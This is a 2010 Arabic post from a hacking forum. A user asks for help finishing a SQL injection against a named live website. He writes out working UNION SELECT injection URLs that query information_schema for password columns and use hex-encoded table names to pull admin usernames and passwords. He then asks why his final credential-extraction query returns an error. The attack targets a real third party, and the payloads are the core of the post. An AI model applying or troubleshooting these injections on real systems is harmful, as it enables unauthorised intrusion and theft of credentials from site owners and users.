التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب
تحديث الصفحة مساعده فى ان عمود اليوزر يعطينى خطاء سبحان الله مع انه صحيح بعد التخمين
التعليمات التقويم مشاركات اليوم البحث

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
السابق المشاركة السابقة   المشاركة التالية التالي
قديم 05-02-2010, 05:55 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية مستر داتا بيز
 

 
 
إحصائية العضو






مستر داتا بيز غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
مستر داتا بيز is on a distinguished road
افتراضي غير مجاب: مساعده فى ان عمود اليوزر يعطينى خطاء سبحان الله مع انه صحيح بعد التخمين

السلام عليكم
اخوانى الكرام

انا جيبت موقع فيه ثغره وطبقت عليها دروس الاخ فولكانو وانا انتظرك بنفسك يا فولكانو ترد عليا الله يكرمك لانى صراحة فى كلاب صعرانه بتجرى فى دماغى دلوقت LOL
المهم اخى انا لا اطيل عليك

الموقع اهو

كود PHP:
http://ismythesishotornot.com/index.php?id=-802 union select 1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5+from+information_schema.columns+where+column_name+like+CHAR(37, 112, 97, 115, 115, 37)-- 
وانا يا اخى عملت الى انت قولت عليه طلعلى عمود الادمن والباس وقاعدة البيانات بالشكل ده
user:Password:mysql
طبعا القاعده الاصدار الخامس وما نسيت امر version()
المهم الان المفروض ان
user
هوا عمود الادمن بعد الكود الى حضرتك شايفه ده
وعمود الباس الي هوا
password
و mysql الى هوا جدول السيغما
طيب الان انظر اخى
جيت اشفر ال عمود User
زي ما حضرتك قولت فى الدرس وادي التشفير اهو
0x75736572
حطيت الامر ده زي ما انت قولت
where+table_name=0x75736572--
طلعلى عمود الاسماء باسم Host
ودي الى طلعت بالضبط
user:Host:mysql
وادى الكود كاملا عشان تشوفه برضه مع العلم العمود المصاب فى هذا الموقع عمود رقم ثلاثه فقط
كود PHP:
http://ismythesishotornot.com/index.php?id=-802 union select 1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5+from+information_schema.columns+where+table_name=0x75736572-- 
المفروض بقى انى هحط التجهيزه بتاعتى بالطريقه دي حسب شرح حضرتك بناء على انى استعلمت على التيبل نيم الى هوا اسم الجدول واليوزر نيم الى هوا اسم المستخدم والباسورد الى هوا مشفر زي ما علمتنا
يعنى هيبقى كده
concat(table_name,0x3a,column_name,0x3a,table_sche ma)
بعد التعديل هيبقى كده
concat(Host,0x3a,Pass)
للعلم طلع معاي الجدول باسم password
وجربتها ايضا
الان لما اجي اعمل Execute من الهاك بار
يقولى
Looks like we had an error. Please check back later.
يعنى فيه خطاء مع العلم ان كل حقنتى صح وانا راجعتها الف مره بس ممكن يكون فى حاجه انت شايفها وانا مش واخد بالى منها سبحان الله جت ع الخطوة الاخيرة وضربت خالص ياريت اخى توضحلى ايه المشكله بالضبط

تحياتى وانتظر الرد

Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC lshu]i tn hk ul,] hgd,.v du'dkn o'hx sfphk hggi lu hki wpdp fu] hgjoldk

   

رد مع اقتباس
 

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
مشكـل مع موقع ثـاني طلع لي الباس و اليوزر و كل شيء صحيح لكـن ... Mr-MoncéFiix جـــ'ابات العناكــ'ب 2 08-23-2010 02:04 PM
سبحان الله طلعت الباسورد واليوزر غلط عملت كل الى فى الدرس برضه غلط حد يرد عليا اكرمكم الله مستر داتا بيز جـــ'ابات العناكــ'ب 3 05-05-2010 05:27 AM
استخراج عمود اليوزر في ها الموقع ..... والله جنني فهههد جـــ'ابات العناكــ'ب 4 05-01-2010 02:41 AM
[درس] : سبحان الله وبحمده سبحان الله العظيم xman2 قســم تطويــر المــــواقع 0 09-22-2009 11:20 PM


الساعة الآن 03:53 PM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0